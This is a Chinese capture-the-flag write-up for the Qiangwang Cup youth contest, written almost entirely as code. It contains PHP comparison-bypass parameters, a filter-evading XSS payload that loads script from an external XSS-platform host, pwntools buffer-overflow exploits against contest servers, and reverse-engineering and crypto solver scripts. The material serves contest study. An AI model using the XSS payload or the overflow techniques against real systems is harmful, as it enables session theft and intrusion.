[强网杯青少年专项赛] 惨惨战队WriteUp
能受天磨真铁汉,不遭人嫉是庸才
Web
/?a1=240610708&a2=QNKCDZO&b1[]=1&b2[]=2&time=8e88
![](https://img2020.cnblogs.com/blog/1212355/202009/1212355-20200912111416864-241209990.png)
POST /?fruit=apple HTTP/1.1 Host: eci-2zejaarzxxkx8pqk0lcy.cloudeci1.ichunqiu.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Http_1s_W0nd3rful X-Forwarded-For:127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.9 Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; browse=CFlaTxUYU0BaV1tCVQJTRFBZSkdeQ1lYWVtFR1dRW0VTUF5PW0VLTgBZXUNbQVxOGllZTFRTW0VbU0VFVlxbTElRWE9dRlNFWUFTCA; UM_distinctid=17438c3cfd544-084b5559307959-7d7f582e-1fa400-17438c3cfd72a; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1599213575,1599230970,1599234684,1599267160; ci_session=4d0653e1d49e44a2ee608a388cea4c1195a1ba76; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1599290610; __jsluid_h=0f528e9a32a83f24c021a258d97f97ca Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 16 vegetable=potato
XSS
<scrsCrIptipt srC=//xs.sb/pQBd></scrisCRipTpt>
/func2?csrf_token=IjA3MGE4YTc4MTU5MzcyNWY3MDkyNjUzMzEzZDlmMTY0NmM2NDA1ODci.X1NzPg.IndHPa7f4YNsJ-Mo-1gG5rOzwwU&name=%3CscrsCrIptipt+srC%3D%2F%2Fxs.sb%2FpQBd%3E%3C%2FscrisCRipTpt%3E&submit=Get+It%21
int __cdecl sub_20000(int a1, int a2) { int result; // eax int i; // [esp+50h] [ebp-64h] int v4; // [esp+54h] [ebp-60h] int v5; // [esp+58h] [ebp-5Ch] int v6; // [esp+5Ch] [ebp-58h] int v7; // [esp+60h] [ebp-54h] int v8[20]; // [esp+64h] [ebp-50h] v4 = 0; v5 = 0; v6 = 0; v7 = 0; while ( 2 ) { switch ( *(unsigned __int8 *)(v7 + a2) ) { case 0xF0u: v8[v6++] = *(unsigned __int8 *)(v5 + a1); ++v7; continue; case 0xF1u: *(_BYTE *)(v5 + a1 - 1) = v8[--v6]; ++v7; continue; case 0xF2u: v4 = v8[--v6]; ++v7; continue; case 0xF3u: v4 += *(unsigned __int8 *)(v7 + a2 + 1); v7 += 2; continue; case 0xF4u: *(&v7 + v6) ^= v4; ++v7; continue; case 0xF5u: ++v5; ++v7; continue; case 0xF6u: if ( *(&v7 + v6) && *(&v7 + v6) != 10 ) ++v7; else v7 += 3; continue; case 0xF7u: for ( i = 0; *(_BYTE *)(i + a1); ++i ) ; result = v5; if ( v5 != i ) { v7 = 0; continue; } return result; default: continue; } } }
:
f = open('a.in') s = f.readline() i = 0 n = [] while i < len(s): n.append(int(s[i:i+2],16)) print int(s[i:i+2],16) i = i + 3 for i in range(len(n)-1-1,-1,-1): n[i] = (n[i] ^ n[i+1] )-1 flag = '' for i in range(len(n)): flag += chr(n[i]) print flag
def dfs(n,dep,step): if flag: return if n == 66: print step exit(0) if dep == 12: return if n > 66: return dfs(3,dep+1,step+'a') dfs(n+4,dep+1,step+'b') dfs(n*7,dep+1,step+'c') dfs(n//5,dep+1,step+'d') dfs(0,0,'')
from pwn import * # io = process('./pwn') io = remote('182.92.184.215',12345) name = 'A' * (0x409F - 0x4060 + 1) + p32(1) io.sendlineafter('start:',name) success('lxy') ''' payload = 'abbdbcbbbbbb' for i in range(len(payload)): io.sendafter('> ',payload[i]) sleep(0.1) ''' io.interactive()
URL
from pwn import* #io = process('./pwn') io = remote('182.92.184.215',34521) elf = ELF('./pwn') def lauch_gdb(io): context.log_level = 'debug' gdb.attach(io) #lauch_gdb(p) io.sendlineafter("(protocol):",'A'*0x39+'\0') io.sendlineafter("(domain):",'A'*0x45) io.sendlineafter("(path):",'A'*0x44+p64(0x401299)) io.interactive()
替换后的table:LM#OPQRSTuvwxyz#VWXYZabcdefghi##lA#CDEFGHIJKmnopqrst012345# 乱码的flag : flag{Mase64d1sdS0dF4nta5tic\x91
import base64 table1 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' table2 = [] for i in range(64): table2.append('#') a = 'sadhlkj122i3upoi213456aABSADHKJHLKJSADSADJLKHUOIPQWUEYUGHJ123456789012233165410123123456789123709864hjklhfjldsnfzkpidjskljkamxcvmbcxamvbnm' en1 = 'c2FkaGxrajEyMmkzdXBvaTIxMzQ1NmFBQlNBREhLSkhMS0pTQURTQURKTEtIVU9JUFFXVUVZVUdISjEyMzQ1Njc4OTAxMjIzMzE2NTQxMDEyMzEyMzQ1Njc4OTEyMzcwOTg2NGhqa2xoZmpsZHNuZnprcGlkanNrbGprYW14Y3ZtYmN4YW12Ym5t' en2 = 'h2QDfRrKfCPsxFDticMpfYTrxtV1yFQMVEyMWPAwXDAxX0IYVZWYVZWvYPnTaZ9uZQQcaZaeaZiTXCPsxtV1yCh4zYLrxCTtxtP2yYVrxOPsxtPsxtV1yCh4zYPsxthqzYl2yRAJf2rHeFImeSyoeGIKhREDfGyKgRIKdb14d3endFy4db12dF5n' for i in range(len(en1)): for j in range(64): if table1[j] == en1[i]: table2[j] = en2[i] break s = 'eFrAe3nNdcyEyCWkxcykZtMkWCWoiRP1iRECkV==' #flag{Mase64_1s_S0_F4nta5tic} pl = [] for i in range(64): if table2[i] == '#': pl.append(i) for i in range(len(pl)): #table2[pl[i]] = 'k' table = '' for j in range(64): table += table2[j] print(table) print (base64.b64decode(s.translate(str.maketrans(table,table1)))) table2[pl[i]] = '#'
flag = '' a = [49, 60, 58, 53, 50, 107, 117, 63, 57, 107, 63, 109, 66, 137, 65, 119, 118, 128, 142, 118, 117, 118, 123, 147, 77, 126, 130, 124, 152, 80, 127, 134, 83, 87, 134, 87, 147, 148, 142, 95, 93, 85] for i in range(len(a)): flag += chr((a[i] - i - 1) ^ 86) print flag
import base64 def F(M,K): M1 = [] for i in range(16): tmp = ord(M[i]) M1.append(chr((tmp >> 4) ^ tmp)) K = list(K) for i in range(16): M1[i] = chr(ord(K[i]) ^ ord(M1[i])) M = list(M) Pe = [14,7,9,1,10,3,2,15,0,13,6,11,12,4,8,5] for i in range(16): M[Pe[i]] = M1[i] return "".join(M) def round(M,K): newL = M[0:16] newR = M[16:32] L = F(newR,K) R = [] for i in range(16): R.append(chr(ord(L[i])^ord(newL[i]))) return "".join(L) + "".join(R) f = open('outfei2.txt') K = [] for i in range(10): K.append(base64.b64decode(f.readline()[:-1])) M = base64.b64decode(f.readline()[:]) for i in range(9,-1,-1): print i M = round(M,K[i]) print M f.close() # flag{4b5b6e66-0fcc-405a-97ca-0}
moss
打开IDE直接导入题目xml文件,
根据前面sercet的值
a = [92, 0, 74, 66, 116, 77, 126 ,69 ,17, 17, 102, 126 ,69 ,79 ,97 ,126, 18 ,76 ,17 ,98 ,16 ,77 ,18 ,86,90,70,64,77,71] flag = '' for i in range(len(a)): a[i] ^= 33 flag += chr(a[i]) print flag[::-1]
steghide luotianyi
easy_pcap
base64解码,
git的
https://github.com/ww23/BlindWatermark
java盲水印
[ * ]博客中转载的文章均已标明出处与来源,若无意产生侵权行为深表歉意,需要删除或更改请联系博主: 2245998470[at]qq.com
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步